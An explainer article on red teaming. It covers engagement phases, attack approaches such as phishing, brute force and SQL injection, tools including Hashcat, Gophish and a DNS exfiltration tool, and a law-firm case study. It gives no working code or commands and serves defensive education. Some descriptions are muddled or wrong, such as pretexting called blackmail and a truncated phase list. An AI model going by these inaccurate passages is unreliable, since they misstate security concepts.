A 2020 survey by Exabeam at Black Hat USA revealed that 92% of the surveyed organizations engage in Red Teaming exercises. This is an increase from 72% in 2019, indicating the growing adoption of Red Teaming by organizations seeking tighter security.
In the same survey, Exabeam reveals that only 11% of organizations’ blue teams catch red teams, and 80% of organizations have increased their investments in red and blue team adoption.
So, what is red teaming and what does your organization stand to gain from it? Our article dives deep into red teaming. Let’s get right in.
What is Red Teaming?
Red teaming is an ethical hacking exercise. A real cyber attack is simulated to determine the strength of an organization’s cybersecurity framework.
The exercise is undertaken by a red team - a team of authorized hackers that engage in different forms of controlled attacks to identify specific gaps and weaknesses within an organization’s cybersecurity infrastructure.
To get the most from red teaming, red teams do not notify the organization of the impending cyberattack exercise. Instead, the red team simulates typical methodologies of hackers at random times.
These simulated methodologies are either cyber threats commonly faced by the organization's cybersecurity architecture or sophisticated/evolved versions of cyberattacks that the organization doesn’t have experience defending against. The randomness of red teaming exercises helps the organization to fully understand its readiness for cyberattacks.
Please note that red teaming isn’t limited to virtual/software-based environments. There is also physical red teaming, which involves emulating exploitation of an organization’s physical assets. Such assets would include items such as:
- Physical servers
- Physical file storage
- Production equipment
- Doors, among others.
Phases of red team application
There are multiple stages in the implementation of red teaming. Each has equal importance in assessing the security posture or strength. These are the key phases:
- Privilege Escalation
Once you identify the specific goals of the red teaming exercise, which may be to extract specific types of data, for instance, the reconnaissance phase begins.
The reconnaissance phase is all about information gathering. It involves collecting information on IT infrastructure components that are relevant to the attack objective.
This can be information about a server, the people managing the server, its dependencies, active security/access control measures, and server traffic, for instance.
Reconnaissance may also gather information on related security operations, such as the Mean Time To Detect (MTTD) and Mean Time To Respond (MTTR) to understand how fast the red teaming operation needs to be executed.
Once reconnaissance is done, planning for the attack begins. The planning phase is executed in the context of information gathered during the reconnaissance phase. It’s here that the rules of engagement, scope of attack, method of attack, and tools for the attack are determined.
The planning phase identifies the following, among others:
- Communication Plans: How the team will communicate during the operation.
- Entry Points: Specific attack vectors that have been identified as vulnerable.
- Target Restrictions: Limitations on what can be targeted during the attack.
- Threat IPs: IP addresses that pose a potential risk.
- Repositories for Collated Data: Where the gathered data will be stored for analysis.
- Alternative Mediums for the Attack: Other methods or channels for carrying out the attack.
- Attack Surface: A comprehensive view of the target's vulnerabilities. Understanding the attack surface is crucial for effective attack surface management and helps in identifying the most vulnerable points for the attack.
Exploitation is the main phase of the red teaming exercise. The entire cybersecurity infrastructure is attacked to find and exploit weaknesses in it.
It also involves targeting relevant human actors (identified during reconnaissance) with social engineering techniques like phishing to indirectly gain access to the IT infrastructure. For instance, this may involve sending phishing links to the work emails of humans managing the targeted server(s).
4. Privilege Escalation
Privilege escalation is the advanced stage of exploitation where the red team achieves its goals. After access is gained into the IT infrastructure during the exploitation phase (i.e., after privilege is gained), the ethical attackers then move to exploit further vulnerabilities.
While avoiding detection by the security architecture, the red team «probes» further by mapping paths to the targets. They then use the access privilege to progressively gain authority over the targets.
Depending on the objectives of the red teaming exercise, the hackers may then exfiltrate data to an external repository.
Between the start of reconnaissance and the end of escalation, the red team continuously collects data.
This data is assessed to gain insights into the strengths and weaknesses of the IT infrastructure. Findings are then reported to the security team and relevant stakeholders.
Insights in the red teaming report will also include recommendations, where necessary, on how the organization may improve its cybersecurity against the specific attack initiated.
Red teaming approaches
As mentioned earlier, during the planning stage, the red team identifies the method of attack to use. This method or methodology of attack relates to the relevant techniques through which the red team breaches the IT infrastructure and through which the end goal is achieved.
The most effective approaches of red teaming exercises include:
1. Social Engineering Testing
Social engineering is a technique that attacks the human component of the IT infrastructure — the IT employees. It aims to utilize psychological manipulation to instigate human interaction that gives up IT control or reveals sensitive data.
One of the most popular social engineering attacks is phishing. This involves sending fraudulent links, emails, or text messages that download malware. They can also obtain sensitive information from employees.
Smishing is phishing through SMS and Vishing is phishing through voice/telephone interactions.
Other social engineering methods include pretexting and tailgating. In pretexting, employees are placed in blackmail situations. In tailgating, the attacker tags along with an authorized employee to gain access to the IT infrastructure.
Also Read: Benefits of Cybersecurity Awareness Training
2. Brute Force Testing
Brute force attacks involve the use of high-powered computers to repeatedly guess passwords.
In red teaming, the ethical hackers utilize tools like Gobuster and BruteX to guess administrative login credentials till they gain access to the IT infrastructure.
3. Network Penetration Testing
Here, the red team focuses on breaching the network infrastructure.They do this through a number of means, including:
- Finding and exploiting misconfigurations
- Utilizing IP spoofing techniques
- Excessively pinging the network
- Exploiting compromised network devices by turning them into rogues.
4. Application Layer Testing
Application layer testing majorly focuses on distributed denial-of-service (DDoS) attacks. DDoS attacks aim to overload a specific function/feature of an application with interactions. The aim is to make this function unresponsive to real users.
Other application layer attacks include:
- SQL injection attacks that target the backend database
- Cross-site scripting attacks that corrupt the execution of application code
- Parameter tampering attacks that alter communication between the application and server.
5. Shared Content Corruption Testing
Shared content corruption is where malware is planted in an internal storage and tags along with any file shared from this storage location to another storage location. It is a method of privilege escalation, allowing the attackers to transfer malware from a breached IT component to other components.
These are just a few of the many different red teaming methodologies that may be individually used or combined by red teams to ethically exploit IT infrastructures.
Red Teaming tools
Specific tools are utilized to control the cyberattack and aid comprehensive reporting of the red teaming operation.
Of course, the security team is going to use depends on the objective of the red teaming exercise. Some popular red teaming tools include:
Nmap is a free Network Reconnaissance tool used to map out IP filters, firewalls, and routers, among others within networks of hundreds of thousands of devices.
Hashcat is a free multi-OS exploitation tool used to execute controlled brute-force attacks. The tool has an interactive pause and resume feature and can predict possible password candidates from files.
- Outdated server and application versions
- Contaminated files
- Server misconfigurations
Gophish is another free open-source exploitation tool that is used to set up, schedule, and monitor phishing campaigns. It comes with customizable phishing templates and delivers phishing results in real time.
BeRoot is a privilege escalation tool used to identify misconfigurations in compromised Windows-based environments.
The DNSExfilterator tool, as its name suggests, is a red teaming completion tool used to secretly export data by hiding it within DNS requests.
As we see, each of these tools has its specific use in the entire process and each operates in different phases of the red teaming exercise.
There are many more diverse red teaming tools not mentioned here, and as we mentioned, you will choose relevant tools based on the objective and plan of the exercise.
How red teaming is helping organizations: Synopsys case studies
How are organizations putting red teams to use? Here is a quick glance at a case study from Synopsys.
With law firms dealing with sensitive client data, Synopsys’ law firm customer was seeking an approach that would give it more visibility than its currently applied security assessments.
Synopsys, a service provider experienced in executing red teaming composite attacks to compromise sensitive data, took up this challenge. It executed the exercise in five phases;
- Adversarial Objectives and Strategy, the phase where the objectives for the attack were determined. The objectives were set to gain access to sensitive client data. This data included petitions plus mergers & acquisition. It also sought to gain administrative access to internal networks and employee email systems to send unauthorized emails.
- «Getting Started», the reconnaissance stage where information on network components and employees was gathered. Synopsys gathered info on web applications, live servers, authentication frameworks, and dependencies. It also had a look into employee emails, phone numbers, job descriptions, and social media backgrounds - just as a hacker would have seen them.
- Attack Path Modeling, the planning stage where the attack motivations and their relevant technical risks, non-technical risks, and composite attack descriptions were comprehensively determined.
- «Execution», the phase where Synopsis carried out its exploitation and privilege escalation attacks on the Law Firm’s infrastructure. The attacks included an Employee Email Services Attack that spied on the exchange of sensitive client communication. This was achieved by gaining access to authorized email accounts through phishing campaigns and impersonating these email accounts when dealing with clients. For privilege escalation, Synopsys launched a Multi-Factor Authentication (MFA) Attack. This utilized reconnaissance to identify services missing MFA. They then logged into these services using one-time credentials, and corrupted services armed with MFA.
- Reporting, the phase where Synopsys’ red team identified two major weaknesses in the Law Firm’s infrastructure. These were the lack of employee awareness against social engineering attacks. The second was the fact that services linked to sensitive client information missed multi-factor authentication.
Synopsys made the following recommendations:
- Adopt MFA on all external-facing services
- Engage in continuous employee enlightenment programs against social security risks
- Exercise continuous auditing of off-the-shelf software version releases before use.
You can find the full case study here.
Red Teaming, Blue Teaming, and Purple Teaming: What's the difference?
Now, at this point you have come across a couple of mentions of «blue teaming». There is one more that is known as purple teaming. How do these three differ?
Blue Teaming is simply the protection of the IT infrastructure against cyber attackers.
Rather than trying to exploit the IT infrastructure with techniques like brute force tools, a defensive toolkit is used to protect and improve the IT infrastructure.
This defensive toolkit typically includes a combination of firewalls, Security Information and Event Management (SIEM) tools, Intrusion Detection Systems (IDS), Vulnerability Management Systems (VMS), Network Security Monitoring (NSM) tools, and Security Orchestration, Automation, and Response (SOAR) tools, among others. Blue teams also protect against red teams.
Purple Teaming, on the other hand, is a collaborative approach where the red and blue teams are brought together. Rather than these two working in a siloed environment that hinders communication and collaboration, they work like a single unit that shares security information.
Also Read: Understanding Vulnerability Management
Are Red Teaming and Penetration Testing the same?
A penetration test (Pen Test) is an offensive approach where cyberattack tools are used to exploit the IT infrastructure. With this definition, it is easy to mistake a pen test for a red teaming exercise. However, they may be distinguished on some technicalities.
Red teaming is objective-oriented. It involves targeting specific datasets and systems. On the other hand, a penetration test seeks to identify as many vulnerabilities (in as many forms) as possible within the IT infrastructure.
Red teaming may require custom tools, involves further probe (privilege escalation), and is typically long-term. Pen Tests, on the other hand, use readily available tools, stop at exploitation, and are short-term.
What’s more, while the blue team typically knows that a pen test will be taking place, the team is in the dark during a red teaming exercise. One last difference is that, while a penetration test only focuses on known vulnerabilities, a red teaming exercise targets both known and unknown vulnerabilities.
- Penetration Testing Cost: A Detailed Guide to Pricing Factors
- Offensive vs Defensive Security: What is the Difference?
Red Teaming limitations
The major challenge with red teaming is that it has a limited scope. As explained, red teaming focuses on utilizing the best methods and techniques to achieve a specific goal.
This means that the offensive assessment is limited to the objective and isn’t comprehensive enough to identify all vulnerabilities within the IT infrastructure. For instance, if the goal is to exfiltrate data, there may be no consideration for vulnerabilities affecting an application’s performance against DDoS attacks.
Hence, we advise organizations in the early stage of cybersecurity development to focus on penetration testing. You should only adopt a red teaming approach when pen tests and other security measures have become understood and reliably matured.
For long term success, consider Red Teaming-as-a-Service. This means you outsource the entire intensive, long-term assessment process to a managed security service provider that offers red teaming. This is just like we see with Synopsys and their law firm customer.
Another approach to managing the lengthy time constraints of the exercise is to adopt a continuous, automated model. Here, manual efforts are eliminated and red teaming assessments are conducted in real-time, with artificial intelligence (AI) managing the whole exercise.